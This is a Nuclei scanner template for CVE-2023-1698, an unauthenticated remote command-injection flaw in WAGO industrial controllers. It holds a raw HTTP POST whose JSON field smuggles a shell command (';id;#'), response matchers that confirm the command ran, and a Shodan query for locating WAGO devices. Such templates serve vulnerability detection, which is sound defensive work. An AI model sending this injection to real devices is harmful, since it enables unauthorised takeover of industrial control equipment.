44 lines
1.2 KiB
YAML
44 lines
1.2 KiB
YAML
id: CVE-2023-1698
|
|
|
|
info:
|
|
name: WAGO - Unauthenticated Remote Command Execution
|
|
author: xianke,DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise.
|
|
reference:
|
|
- https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-1698
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-1698
|
|
cwe-id: CWE-78
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: html:"WAGO"
|
|
tags: cve,cve2023,wago,rce,unauth
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
{"package":";id;#"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"license":'
|
|
- '"package":'
|
|
- 'uid'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|